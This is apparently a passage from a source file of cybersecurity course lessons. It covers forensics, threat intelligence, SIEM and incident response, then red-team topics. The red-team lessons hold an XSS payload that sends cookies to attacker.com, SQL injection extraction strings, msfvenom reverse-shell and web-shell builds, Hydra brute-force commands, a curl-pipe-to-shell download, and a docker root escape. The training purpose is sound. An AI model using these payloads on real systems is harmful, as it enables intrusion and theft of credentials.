- **$MFT** — Master File Table — metadata for every NTFS file
- **$LogFile** — NTFS transaction log
- **$UsnJrnl** — Change journal tracking file modifications
- **Recycle Bin** — \`C:\\$Recycle.Bin\\SID\\*\`

## Eric Zimmerman's Tools
- **PECmd** — Parse Prefetch files
- **JLECmd** — Parse Jump Lists
- **ShellBags Explorer** — Browse shellbag data
- **MFTECmd** — Parse $MFT
- **Registry Explorer** — Browse registry hives offline`,

  "browser-forensics": `## Browser Forensics

## What Browsers Store
- Browsing history (URLs, visit counts, timestamps)
- Downloaded files (paths, URLs, timestamps)
- Cookies (session tokens, tracking)
- Cached pages and images
- Saved passwords and form data
- Bookmarks

## Artifact Locations

### Chrome / Edge (Chromium)
\`\`\`
%LocalAppData%\\Google\\Chrome\\User Data\\Default\\
├── History          (SQLite database)
├── Cookies          (SQLite database)
├── Login Data       (SQLite — saved passwords, encrypted)
├── Web Data         (SQLite — autofill, credit cards)
├── Bookmarks        (JSON)
└── Cache/           (cached web content)
\`\`\`

### Firefox
\`\`\`
%AppData%\\Mozilla\\Firefox\\Profiles\\*.default\\
├── places.sqlite    (history + bookmarks)
├── cookies.sqlite
├── logins.json      (saved passwords)
├── formhistory.sqlite
└── cache2/
\`\`\`

## Tools
- **Browser History Capturer** — Captures browser data for analysis
- **Browser History Viewer** — Displays captured history in a timeline
- **DB Browser for SQLite** — Open and query browser databases directly
- **Hindsight** — Chrome forensics tool

## Security Relevance
- Browser history reveals phishing URLs visited
- Download history shows malware delivery
- Cookies contain session tokens (stolen = account takeover)
- Cached content may contain sensitive documents`,

  // ═══════════════════════════════════════════
  // BLUE TEAM — Threat Intelligence
  // ═══════════════════════════════════════════

  "ti-fundamentals": `## Threat Intelligence Fundamentals

## Types of Threat Intelligence
- **Strategic** — High-level trends for executives (who's attacking, why, geopolitics)
- **Tactical** — TTPs (Tactics, Techniques, Procedures) for security teams
- **Operational** — Details about specific campaigns, timing, targets
- **Technical** — IOCs: IP addresses, domains, file hashes, URLs

## Key Frameworks
### MITRE ATT&CK
- Matrix of adversary tactics (columns) and techniques (rows)
- 14 tactics from Initial Access to Impact
- Each technique has documented procedures, detection methods, mitigations

### Cyber Kill Chain (Lockheed Martin)
1. Reconnaissance → 2. Weaponization → 3. Delivery → 4. Exploitation → 5. Installation → 6. Command & Control → 7. Actions on Objectives

### Diamond Model
Four vertices: **Adversary ↔ Capability ↔ Infrastructure ↔ Victim**

## Intelligence Lifecycle
1. **Planning & Direction** — Define intelligence requirements
2. **Collection** — Gather data from sources (OSINT, feeds, sensors)
3. **Processing** — Normalize and structure raw data
4. **Analysis** — Turn data into actionable intelligence
5. **Dissemination** — Share with stakeholders
6. **Feedback** — Evaluate and refine the process`,

  "ti-platforms": `## Threat Intel Platforms

## MISP (Malware Information Sharing Platform)
- Open-source threat intelligence sharing platform
- Stores and correlates IOCs (IPs, hashes, domains, emails)
- Supports STIX/TAXII for automated sharing
- Integrates with SIEMs, firewalls, and IDS systems

## OpenCTI
- Knowledge management platform for threat intelligence
- Visualizes relationships between threats, actors, and campaigns
- Supports STIX 2.1 natively
- Integrates with MISP, VirusTotal, and other sources

## Data Formats
- **STIX** (Structured Threat Information eXpressions) — Standard language for describing cyber threats
- **TAXII** (Trusted Automated eXchange of Indicator Information) — Transport protocol for sharing STIX data
- **OpenIOC** — Mandiant's indicator format (XML-based)

## Setting Up Threat Feeds
\`\`\`
Common free threat feeds:
- AlienVault OTX (otx.alienvault.com)
- Abuse.ch (URLhaus, MalwareBazaar, ThreatFox)
- PhishTank
- EmergingThreats (Snort/Suricata rules)
- CIRCL (Luxembourg CERT)
\`\`\``,

  "ti-osint": `## OSINT & Indicator Analysis

## Key OSINT Platforms
- **VirusTotal** — Scan files/URLs against 70+ antivirus engines
- **Shodan** — Search engine for internet-connected devices
- **Censys** — Similar to Shodan, focuses on certificates and hosts
- **DomainTools** — WHOIS, DNS history, and domain reputation
- **AlienVault OTX** — Community threat intelligence

## Investigating IOCs

### IP Addresses
\`\`\`
Check: VirusTotal, AbuseIPDB, Shodan, GreyNoise
Look for: Geolocation, ASN, hosting provider, reputation score
\`\`\`

### Domains
\`\`\`
Check: VirusTotal, URLhaus, DomainTools WHOIS
Look for: Registration date, registrar, DNS records, historical IPs
Red flags: Recently registered, privacy-protected WHOIS, typosquatting
\`\`\`

### File Hashes
\`\`\`
Check: VirusTotal, MalwareBazaar, Hybrid Analysis
Look for: Detection ratio, malware family, behavioral analysis
Hash types: MD5 (legacy), SHA1, SHA256 (preferred)
\`\`\`

## OSINT Framework
The OSINT Framework (osintframework.com) organizes hundreds of free tools by category:
- Username search, email lookup, domain investigation
- Social media, geolocation, image analysis
- Dark web monitoring, data breach search`,

  "ti-attack-navigator": `## MITRE ATT&CK Navigator

## What is ATT&CK Navigator?
A web-based tool for visualizing and annotating the ATT&CK matrix. Used for:
- Mapping adversary behaviors to techniques
- Identifying detection gaps in your security posture
- Planning red team operations
- Tracking incident findings

## Common Use Cases

### Threat Actor Profiling
1. Research a threat actor (e.g., APT29/Cozy Bear)
2. Create a new layer in Navigator
3. Highlight techniques used by that actor
4. Identify which techniques you can/cannot detect

### Detection Gap Analysis
1. Create a layer with all techniques you CAN detect
2. Create a layer with techniques used by relevant threat actors
3. Overlay them — gaps are your blind spots
4. Prioritize building detections for uncovered techniques

### Incident Mapping
During an IR engagement, map observed techniques to ATT&CK:
- What initial access vector was used?
- How did they persist?
- What lateral movement techniques were observed?
- How was data exfiltrated?

## Key ATT&CK Tactics
\`\`\`
TA0001 Initial Access       TA0002 Execution
TA0003 Persistence          TA0004 Privilege Escalation
TA0005 Defense Evasion       TA0006 Credential Access
TA0007 Discovery            TA0008 Lateral Movement
TA0009 Collection           TA0010 Exfiltration
TA0011 Command & Control    TA0040 Impact
\`\`\``,

  // ═══════════════════════════════════════════
  // BLUE TEAM — Phishing
  // ═══════════════════════════════════════════

  "phishing-fundamentals": `## Phishing Analysis Fundamentals

## Types of Phishing
- **Email phishing** — Mass emails impersonating trusted brands
- **Spear phishing** — Targeted at specific individuals
- **Whaling** — Targeting executives/high-value targets
- **Smishing** — SMS-based phishing
- **Vishing** — Voice/phone-based phishing
- **Business Email Compromise (BEC)** — Impersonating executives for wire transfers

## Common Indicators
- **Sender mismatch** — Display name vs actual email address
- **Urgency** — "Act now!", "Your account will be suspended"
- **Suspicious links** — Hover to check URL before clicking
- **Attachments** — Unexpected .doc, .xls, .pdf, .zip files
- **Grammar/spelling errors** — Often in less sophisticated campaigns
- **Generic greeting** — "Dear Customer" instead of your name

## Social Engineering Tactics
- **Authority** — Impersonating IT admin, CEO, or government
- **Urgency** — Time pressure to prevent careful thinking
- **Fear** — "Your account is compromised"
- **Curiosity** — "You have a package delivery"
- **Greed** — "You've won a prize"`,

  "email-header-analysis": `## Email Header Analysis

## Key Headers to Examine
\`\`\`
From:           Display name and email address
Return-Path:    Where bounced emails go (real sender)
Reply-To:       Where replies go (often different in phishing)
Received:       Mail servers the email passed through (bottom = origin)
X-Originating-IP:  Sender's IP address
Message-ID:     Unique identifier
Date:           When sent
Authentication-Results:  SPF, DKIM, DMARC results
\`\`\`

## Email Authentication
- **SPF** (Sender Policy Framework) — Lists authorized sending IPs for a domain
- **DKIM** (DomainKeys Identified Mail) — Cryptographic signature verifying message integrity
- **DMARC** — Policy combining SPF + DKIM, tells receivers what to do with failures

## Analysis Workflow
1. View full/raw email headers
2. Check Return-Path vs From — mismatch = spoofing
3. Read Received headers bottom-to-top to trace origin
4. Check Authentication-Results for SPF/DKIM/DMARC pass/fail
5. Extract and investigate sender IP, domain, and links

## Tools
- **MXToolbox Header Analyzer** — Paste headers for analysis
- **PhishTool** — Automated phishing email analysis
- **Google Admin Toolbox** — Email header analyzer`,

  "url-attachment-analysis": `## URL & Attachment Analysis

## Safe URL Analysis
**NEVER click suspicious links directly.** Use these tools:
- **VirusTotal** — Scan URL against 70+ security vendors
- **URLScan.io** — Takes a screenshot and analyzes the page
- **URL2PNG** — Safe screenshot of a URL
- **WannaBrowser** — Browse URLs safely in a sandbox
- **Any.run** — Interactive malware sandbox

## URL Red Flags
- Typosquatting: \`micr0soft.com\`, \`g00gle.com\`
- Subdomains: \`login.microsoft.com.evil.site\`
- URL shorteners: bit.ly, tinyurl hiding the real destination
- IP addresses instead of domains
- Unusual TLDs: .tk, .ml, .xyz
- \`@\` symbol in URL (browser ignores everything before @)

## Attachment Analysis
\`\`\`bash
# Check file type (don't trust extension)
file suspicious.pdf

# Extract strings
strings suspicious.doc | grep -i "http\\|powershell\\|cmd"

# Compute hash for VirusTotal lookup
sha256sum suspicious.pdf

# For Office documents
olevba suspicious.doc    # Extract VBA macros
\`\`\`

## CyberChef (gchq.github.io/CyberChef)
The "Cyber Swiss Army Knife" — use it for:
- Base64 decode/encode
- URL decode
- Defanging/refanging IOCs
- Extracting URLs from documents
- XOR decryption
- Hex to ASCII conversion`,

  // ═══════════════════════════════════════════
  // BLUE TEAM — SIEM
  // ═══════════════════════════════════════════

  "siem-fundamentals": `## SIEM Fundamentals

## What is SIEM?
Security Information and Event Management — collects, normalizes, correlates, and analyzes log data from across your environment.

## Core Functions
- **Log Collection** — Ingest logs from servers, firewalls, endpoints, applications
- **Normalization** — Convert different log formats to a common schema
- **Correlation** — Link related events across sources to detect attacks
- **Alerting** — Trigger notifications when detection rules match
- **Dashboarding** — Visualize security posture and trends
- **Retention** — Store logs for compliance and investigation

## Log Sources
\`\`\`
Windows Event Logs    Firewall logs         IDS/IPS alerts
Linux syslog/auditd   Web server logs       Email gateway logs
DNS query logs        VPN/authentication    Cloud audit trails
Endpoint Detection    Active Directory      Database audit logs
\`\`\`

## Detection Approaches
- **Signature-based** — Known patterns (like antivirus rules)
- **Anomaly-based** — Deviations from normal behavior baselines
- **Correlation rules** — Multiple events matching a pattern (e.g., 5 failed logins + 1 success)
- **Threat hunting** — Proactive search for hidden threats

## Common SIEM Platforms
- **Splunk** — Market leader, powerful SPL query language
- **Elastic SIEM** — Open-source, built on Elasticsearch
- **Microsoft Sentinel** — Cloud-native, integrated with Azure
- **IBM QRadar** — Enterprise-focused
- **Wazuh** — Open-source, combines SIEM + EDR`,

  "splunk-basics": `## Splunk Fundamentals

## SPL (Search Processing Language)
\`\`\`
# Basic search
index=main sourcetype=syslog "failed password"

# Filter with where
index=web | where status >= 400

# Statistics
index=firewall action=blocked | stats count by src_ip | sort -count

# Time chart
index=auth | timechart span=1h count by action

# Top values
index=web | top 10 uri_path

# Rare values (find anomalies)
index=dns | rare query

# Table output
index=web | table _time, src_ip, uri_path, status | head 100

# Rename and format
index=auth | stats count as "Total Attempts" by user | sort -"Total Attempts"
\`\`\`

## Useful Searches for Security
\`\`\`
# Failed login attempts by source
index=auth "failed" | stats count by src_ip | where count > 10

# Outbound traffic to unusual ports
index=firewall direction=outbound NOT (dest_port IN (80,443,53)) | stats count by dest_port

# PowerShell execution (suspicious)
index=windows EventCode=4688 "powershell" | table _time, user, CommandLine

# New user account creation
index=windows EventCode=4720 | table _time, user, TargetUserName

# Large data transfers
index=proxy | stats sum(bytes_out) as total by src_ip | where total > 100000000
\`\`\`

## Key Concepts
- **index** — Where data is stored (like a database)
- **sourcetype** — Format/type of log data
- **fields** — Key-value pairs extracted from events
- **transforming commands** — stats, chart, timechart, top, rare`,

  "sigma-rules": `## Sigma Detection Rules

## What is Sigma?
Sigma is a generic, vendor-agnostic signature format for SIEM detection rules. Write once, convert to any SIEM platform.

## Sigma Rule Structure
\`\`\`yaml
title: Suspicious PowerShell Download Cradle
status: experimental
description: Detects PowerShell download cradles commonly used by attackers
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        CommandLine|contains|all:
            - 'powershell'
            - 'downloadstring'
    condition: selection
level: high
tags:
    - attack.execution
    - attack.t1059.001
falsepositives:
    - Legitimate admin scripts
\`\`\`

## Key Detection Modifiers
- \`|contains\` — Field contains the value
- \`|startswith\` / \`|endswith\` — Position matching
- \`|all\` — All values must be present
- \`|re\` — Regular expression matching

## Condition Logic
- \`selection\` — Simple match
- \`selection and not filter\` — Match but exclude false positives
- \`selection1 or selection2\` — Either condition
- \`selection | count() > 5\` — Aggregation

## Converting Sigma Rules
\`\`\`bash
# Install sigma CLI
pip install sigma-cli

# Convert to Splunk
sigma convert -t splunk -p sysmon rule.yml

# Convert to Elastic
sigma convert -t elasticsearch rule.yml
\`\`\``,

  "deepbluecli": `## DeepBlueCLI & Windows Event Analysis

## What is DeepBlueCLI?
A PowerShell script that analyzes Windows Event Logs for indicators of attack, including:
- Suspicious command-line activity
- Service installations
- User account manipulation
- Obfuscated PowerShell commands

## Usage
\`\`\`powershell
# Analyze live Security log
.\\DeepBlue.ps1 -log Security

# Analyze saved event log file
.\\DeepBlue.ps1 -log .\\exported_security.evtx

# Analyze System log
.\\DeepBlue.ps1 -log System
\`\`\`

## What It Detects
- Password spraying and brute-force attacks
- New user creation by non-admin accounts
- Suspicious service installations
- PowerShell encoded commands
- Mimikatz-like behavior
- Event log clearing

## Manual Event Log Analysis
\`\`\`powershell
# PowerShell: Search for failed logins
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} |
    Select-Object TimeCreated, @{N='IP';E={$_.Properties[19].Value}},
    @{N='User';E={$_.Properties[5].Value}}

# Search for new processes with command line
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} |
    Where-Object {$_.Message -match 'powershell|cmd|certutil'} |
    Select-Object TimeCreated, Message | Format-List

# Check for cleared logs
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=1102}
\`\`\`

## Key Event Sources
- **Security.evtx** — Authentication, account management, policy changes
- **System.evtx** — Service installations, driver loading, shutdowns
- **PowerShell/Operational** — PowerShell command execution logging
- **Sysmon** — Enhanced process, network, and file monitoring`,

  // ═══════════════════════════════════════════
  // BLUE TEAM — Incident Response
  // ═══════════════════════════════════════════

  "ir-fundamentals": `## Incident Response Fundamentals (PICERL)

## The 6 Phases

### 1. Preparation
- Develop IR plans and playbooks
- Train the team with tabletop exercises
- Deploy monitoring tools (SIEM, EDR, IDS)
- Establish communication channels and escalation paths

### 2. Identification
- Detect the incident through alerts, reports, or hunting
- Determine scope: What systems are affected?
- Classify severity: Critical / High / Medium / Low
- Assign incident ID and begin documentation

### 3. Containment
- **Short-term**: Isolate affected systems from network
- **Long-term**: Apply temporary fixes while preserving evidence
- Decide: Shut down or keep running for evidence collection?
- Block malicious IPs/domains at firewall/proxy

### 4. Eradication
- Remove malware, backdoors, and persistence mechanisms
- Patch the vulnerability that was exploited
- Reset compromised credentials
- Verify all attacker footholds are removed

### 5. Recovery
- Restore systems from clean backups
- Rebuild compromised systems from scratch
- Monitor closely for signs of re-compromise
- Gradually restore normal operations

### 6. Lessons Learned
- Conduct post-incident review within 1-2 weeks
- Document: What happened, timeline, what worked, what didn't
- Update procedures, detection rules, and training
- Share anonymized findings with the security community`,

  "case-management": `## Case Management with TheHive

## What is TheHive?
An open-source Security Incident Response Platform (SIRP) for:
- Managing security incidents as cases
- Tracking tasks and assignments
- Storing and analyzing observables (IOCs)
- Integrating with MISP, Cortex, and other tools

## Key Concepts
- **Case** — A security incident being investigated
- **Task** — Individual work items within a case
- **Observable** — IOCs associated with the case (IPs, hashes, URLs)
- **Alert** — Incoming notification that may become a case
- **Template** — Pre-defined case structure for common incident types

## Workflow
1. Alert arrives (from SIEM, email, or manual creation)
2. Analyst reviews and promotes to a case (or marks as false positive)
3. Tasks are auto-created from templates
4. Analysts work tasks, add observables, and document findings
5. Observables are automatically analyzed via Cortex
6. Case is closed with a resolution summary

## Cortex Integration
Cortex is TheHive's analysis engine. It automatically enriches observables:
- VirusTotal lookup for hashes and URLs
- WHOIS/DNS for domains
- Geolocation for IP addresses
- Abuse database checks

## Best Practices
- Use templates for common incidents (phishing, malware, data breach)
- Tag cases with MITRE ATT&CK techniques
- Link related cases together
- Export IOCs to MISP for sharing`,

  "ir-containment": `## Containment & Eradication Techniques

## Containment Strategies

### Network Isolation
\`\`\`
- Disconnect from network (pull cable / disable NIC)
- Move to quarantine VLAN
- Block at firewall/switch level
- Null-route attacker IPs
\`\`\`

### Endpoint Containment
\`\`\`
- EDR isolation (keeps management connection, blocks all else)
- Disable compromised user accounts
- Revoke active sessions and tokens
- Block malicious processes
\`\`\`

## Evidence Collection During Containment
\`\`\`bash
# Collect volatile evidence FIRST (before shutdown)
# 1. Memory dump
winpmem.exe memdump.raw

# 2. Running processes
tasklist /v > processes.txt

# 3. Network connections
netstat -anob > connections.txt

# 4. Logged-on users
query user > users.txt

# 5. Recent file changes
dir /s /b /a /o-d C:\\ > recent_files.txt
\`\`\`

## KAPE for Rapid Triage
KAPE collects key forensic artifacts in minutes:
- Registry hives
- Event logs
- Prefetch files
- Browser data
- $MFT and $UsnJrnl

## Eradication Steps
1. Identify ALL persistence mechanisms (registry, scheduled tasks, services, startup items)
2. Remove malware files and associated artifacts
3. Patch the exploited vulnerability
4. Reset ALL potentially compromised credentials
5. Verify removal with fresh scans and manual checks`,

  "ir-playbooks": `## IR Playbooks & Tabletop Exercises

## What is an IR Playbook?
A step-by-step guide for handling specific incident types. Each playbook includes:
- Trigger conditions (what activates this playbook)
- Roles and responsibilities
- Step-by-step response procedures
- Communication templates
- Escalation criteria

## Common Playbook Types
- **Phishing** — Report → analyze headers → check links → block sender → notify users
- **Malware** — Isolate → collect evidence → analyze → eradicate → restore
- **Data Breach** — Contain → assess scope → notify legal → preserve evidence → report
- **Ransomware** — Isolate → assess backup viability → DO NOT pay → restore → investigate
- **Insider Threat** — Involve HR/legal → preserve evidence → monitor → contain access

## Tabletop Exercises
Simulated incident scenarios discussed around a table (no live systems).

### Running a Tabletop
1. **Scenario**: Present a realistic incident narrative
2. **Discussion**: Team discusses response step by step
3. **Injects**: Facilitator adds complications (attacker escalates, media calls)
4. **Review**: Identify gaps in plans, training, and tools

### Example Scenario
"It's 2 AM. Your SOC receives an alert: a domain controller is communicating with a known C2 IP. The DC handles authentication for 5,000 users. What do you do?"

## Key Metrics
- **MTTD** (Mean Time to Detect) — How fast you spot incidents
- **MTTR** (Mean Time to Respond) — How fast you contain them
- **False Positive Rate** — Percentage of alerts that aren't real incidents`,

  // ═══════════════════════════════════════════
  // RED TEAM
  // ═══════════════════════════════════════════

  "passive-recon": `## Passive Reconnaissance
Gathering information without directly touching the target.

## OSINT Techniques
\`\`\`bash
# WHOIS lookup
whois target.com

# DNS enumeration
dig target.com ANY
dig target.com MX
dig target.com NS

# Subdomain enumeration
amass enum -passive -d target.com
subfinder -d target.com
\`\`\`

## Key OSINT Sources
- **Shodan.io** — Search for exposed services and devices
- **Google Dorks** — \`site:target.com filetype:pdf\`, \`inurl:admin\`
- **theHarvester** — Emails, subdomains, hosts, IPs
- **Recon-ng** — Modular OSINT framework
- **LinkedIn** — Employee names, roles, technologies used
- **GitHub** — Leaked credentials, API keys, internal code
- **Wayback Machine** — Historical versions of websites

## Google Dorking Examples
\`\`\`
site:target.com filetype:pdf          # PDF documents
site:target.com inurl:login            # Login pages
site:target.com "password" filetype:txt # Password files
intext:"@target.com"                   # Email addresses
site:github.com "target.com" password  # Leaked creds on GitHub
\`\`\``,

  "active-recon": `## Active Scanning with Nmap

## Scanning Methodology
\`\`\`bash
# 1. Fast initial scan (top 1000 ports)
nmap -sC -sV -oN initial.txt target

# 2. Full port scan
nmap -p- -oN allports.txt target

# 3. Targeted scan on discovered ports
nmap -sC -sV -p 80,443,8080,3306 -oN targeted.txt target

# 4. UDP scan (top 20 ports — UDP is slow)
nmap -sU --top-ports 20 -oN udp.txt target
\`\`\`

## Essential Nmap Flags
\`\`\`
-sS    SYN scan (stealth, default for root)
-sT    TCP connect scan (no root needed)
-sU    UDP scan
-sV    Service version detection
-sC    Default NSE scripts
-O     OS detection
-A     Aggressive (OS + version + scripts + traceroute)
-p-    All 65535 ports
-Pn    Skip host discovery (treat as online)
-oN    Output to normal text file
-oA    Output all formats (.nmap, .xml, .gnmap)
--script=vuln  Run vulnerability scripts
\`\`\`

## Nmap Scripting Engine (NSE)
\`\`\`bash
nmap --script=http-enum target              # Web directory enumeration
nmap --script=smb-enum-shares target        # SMB share listing
nmap --script=vuln target                   # Vulnerability scan
nmap --script=ssl-heartbleed target         # Heartbleed check
\`\`\``,

  "web-enumeration": `## Web Enumeration & Directory Busting

## Directory Brute-Forcing
\`\`\`bash
# Gobuster
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

# feroxbuster (faster, recursive)
feroxbuster -u http://target -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

# ffuf (fast fuzzer)
ffuf -u http://target/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt
\`\`\`

## Virtual Host Discovery
\`\`\`bash
ffuf -u http://target -H "Host: FUZZ.target.com" -w subdomains.txt -fs 0
gobuster vhost -u http://target -w subdomains.txt
\`\`\`

## Technology Fingerprinting
\`\`\`bash
whatweb http://target           # Identify technologies
wappalyzer                      # Browser extension
curl -I http://target           # Check response headers
\`\`\`

## CMS-Specific Enumeration
\`\`\`bash
# WordPress
wpscan --url http://target --enumerate u,vp,vt

# Joomla
joomscan -u http://target

# Drupal
droopescan scan drupal -u http://target
\`\`\`

## Key Wordlists (SecLists)
\`\`\`
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Discovery/Web-Content/big.txt
/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
\`\`\``,

  "owasp-top10": `## OWASP Top 10 (2021)

## A01: Broken Access Control
- Users accessing unauthorized resources
- IDOR (Insecure Direct Object Reference): changing \`?id=1\` to \`?id=2\`
- Missing function-level access control

## A02: Cryptographic Failures
- Sensitive data transmitted in cleartext (HTTP instead of HTTPS)
- Weak encryption algorithms (MD5, SHA1 for passwords)
- Exposed database backups or config files

## A03: Injection
- SQL Injection, Command Injection, LDAP Injection
- User input interpreted as code/commands

## A04: Insecure Design
- Missing security controls in the application architecture
- No rate limiting, no CAPTCHA, no account lockout

## A05: Security Misconfiguration
- Default credentials left unchanged
- Unnecessary features enabled (directory listing, debug mode)
- Missing security headers

## A06: Vulnerable Components
- Using libraries/frameworks with known CVEs
- Not updating dependencies

## A07: Authentication Failures
- Weak passwords allowed, no MFA
- Session tokens in URLs, no session timeout

## A08: Software & Data Integrity Failures
- Untrusted CI/CD pipelines, unsigned updates
- Deserialization vulnerabilities

## A09: Security Logging & Monitoring Failures
- No logging of authentication attempts
- Logs not monitored or alerting not configured

## A10: Server-Side Request Forgery (SSRF)
- Application fetches URLs provided by users
- Can access internal services, cloud metadata`,

  "sqli": `## SQL Injection

## Types
- **UNION-based** — Append queries to extract data
- **Error-based** — Extract data through error messages
- **Blind Boolean** — True/false responses reveal data
- **Blind Time-based** — Delays indicate true/false
- **Out-of-band** — Data sent via DNS/HTTP to attacker

## Testing for SQLi
\`\`\`
' OR 1=1--          # Classic authentication bypass
' OR '1'='1         # String-based bypass
1' ORDER BY 1--     # Determine column count
1' UNION SELECT 1,2,3--  # Test UNION injection
\`\`\`

## UNION-Based Extraction
\`\`\`sql
-- Find number of columns
' ORDER BY 1-- (increment until error)

-- Find visible columns
' UNION SELECT 1,2,3--

-- Extract database info
' UNION SELECT 1,version(),3--
' UNION SELECT 1,database(),3--
' UNION SELECT 1,table_name,3 FROM information_schema.tables--
' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,username,password FROM users--
\`\`\`

## Prevention
- **Parameterized queries** (prepared statements)
- **Input validation** and sanitization
- **Least privilege** database accounts
- **WAF** (Web Application Firewall) as defense-in-depth`,

  "xss": `## Cross-Site Scripting (XSS)

## Types
- **Reflected** — Payload in URL, executed when victim clicks link
- **Stored** — Payload saved in database, executes for all viewers
- **DOM-based** — Payload manipulates client-side JavaScript

## Basic Payloads
\`\`\`html
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
"><script>alert('XSS')</script>
'-alert('XSS')-'
javascript:alert('XSS')
\`\`\`

## Cookie Stealing
\`\`\`html
<script>
  fetch('http://attacker.com/steal?c='+document.cookie)
</script>

<img src=x onerror="fetch('http://attacker.com/steal?c='+document.cookie)">
\`\`\`

## Filter Bypass Techniques
\`\`\`html
<ScRiPt>alert('XSS')</ScRiPt>           # Case variation
<scr<script>ipt>alert('XSS')</script>   # Nested tags
<img src=x onerror=alert(String.fromCharCode(88,83,83))>  # Char codes
<svg/onload=alert('XSS')>               # No spaces
\`\`\`

## Prevention
- **Output encoding** — HTML-encode user data before rendering
- **Content Security Policy (CSP)** — Restrict script sources
- **HttpOnly cookies** — Prevent JavaScript access to session cookies
- **Input validation** — Whitelist acceptable characters`,

  "burp-suite": `## Burp Suite Mastery

## Core Tools
- **Proxy** — Intercept and modify HTTP/S traffic
- **Repeater** — Manually modify and resend individual requests
- **Intruder** — Automated attacks (fuzzing, brute force)
- **Decoder** — Encode/decode data (Base64, URL, HTML)
- **Comparer** — Diff two responses to find differences

## Setup
1. Configure browser proxy to 127.0.0.1:8080
2. Install Burp's CA certificate for HTTPS interception
3. Use FoxyProxy browser extension for easy toggling

## Proxy Workflow
1. Enable interception (Proxy → Intercept → On)
2. Browse the target application
3. Inspect/modify requests before forwarding
4. Send interesting requests to Repeater for manual testing

## Repeater Tips
- Modify parameters, headers, cookies, and body
- Compare responses side-by-side
- Test SQLi, XSS, and other injections manually
- Right-click → "Send to Repeater" from Proxy history

## Intruder Attack Types
- **Sniper** — One payload position at a time
- **Battering Ram** — Same payload in all positions
- **Pitchfork** — Different payload lists per position (parallel)
- **Cluster Bomb** — All combinations of payload lists`,

  "metasploit": `## Metasploit Framework

## Basic Workflow
\`\`\`bash
msfconsole                        # Start Metasploit
search eternalblue                # Find modules
use exploit/windows/smb/ms17_010_eternalblue
show options                       # View required settings
set RHOSTS 10.10.10.5             # Set target
set LHOST 10.10.14.2              # Set your IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit                            # Launch the exploit
\`\`\`

## Module Types
- **exploit/** — Code that targets a vulnerability
- **auxiliary/** — Scanners, fuzzers, brute-forcers
- **post/** — Post-exploitation modules
- **payload/** — Code executed after exploitation

## Meterpreter Commands
\`\`\`bash
sysinfo                   # System information
getuid                    # Current user
getsystem                 # Attempt SYSTEM escalation
hashdump                  # Dump password hashes
upload /local/file /remote # Upload file
download /remote/file      # Download file
shell                      # Drop to system shell
migrate PID               # Migrate to another process
portfwd add -l 3389 -p 3389 -r 10.10.10.5  # Port forward
run post/windows/gather/enum_logged_on_users
\`\`\`

## Payload Generation (msfvenom)
\`\`\`bash
# Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exe

# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f elf -o shell.elf

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f raw -o shell.php

# Staged vs stageless
# windows/meterpreter/reverse_tcp   — Staged (smaller, two-part)
# windows/meterpreter_reverse_tcp   — Stageless (one payload, more reliable)
\`\`\``,

  "password-attacks": `## Password Attacks & Cracking

## Online Attacks (Against Live Services)
\`\`\`bash
# Hydra — SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target

# Hydra — HTTP POST form
hydra -l admin -P rockyou.txt target http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# Hydra — FTP
hydra -L users.txt -P passwords.txt ftp://target

# CrackMapExec — SMB
crackmapexec smb target -u users.txt -p passwords.txt
\`\`\`

## Offline Attacks (Cracking Hashes)
\`\`\`bash
# Identify hash type
hash-identifier
hashid 'hash_value'

# Hashcat
hashcat -m 0 hash.txt rockyou.txt          # MD5
hashcat -m 1000 hash.txt rockyou.txt       # NTLM
hashcat -m 5600 hash.txt rockyou.txt       # NTLMv2
hashcat -m 1800 hash.txt rockyou.txt       # SHA-512 (Linux shadow)
hashcat -m 13100 hash.txt rockyou.txt      # Kerberoast

# John the Ripper
john --wordlist=rockyou.txt hash.txt
john --show hash.txt                        # Show cracked
\`\`\`

## Wordlists
\`\`\`
/usr/share/wordlists/rockyou.txt           # Classic (14M passwords)
/usr/share/seclists/Passwords/             # SecLists collection
# Generate custom wordlist from website
cewl http://target -m 5 -w custom.txt
\`\`\``,

  "privesc-linux": `## Linux Privilege Escalation

## Enumeration Checklist
\`\`\`bash
# Current user and groups
id; whoami

# Sudo permissions
sudo -l

# SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Writable cron jobs
cat /etc/crontab; ls -la /etc/cron.*

# World-writable files/directories
find / -writable -type f 2>/dev/null

# Capabilities
getcap -r / 2>/dev/null

# Running processes
ps aux

# Network connections
ss -tulnp; netstat -tulnp

# Kernel version (for kernel exploits)
uname -a; cat /etc/os-release
\`\`\`

## Common Vectors
- **sudo -l** → GTFOBins for that binary
- **SUID binaries** → GTFOBins or custom exploitation
- **Writable cron scripts** → Inject reverse shell
- **PATH hijacking** → SUID binary calls command without full path
- **Kernel exploits** → DirtyPipe, DirtyCow (last resort)
- **Docker group** → \`docker run -v /:/mnt --rm -it alpine chroot /mnt\`
- **Capabilities** → \`python3 = cap_setuid\` → spawn root shell

## Automated Tools
\`\`\`bash
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# pspy (monitor processes without root)
./pspy64
\`\`\``,

  "privesc-windows": `## Windows Privilege Escalation

## Enumeration
\`\`\`powershell
whoami /all                        # User, groups, privileges
systeminfo                         # OS version, patches
net user                           # Local users
net localgroup Administrators      # Admin group members
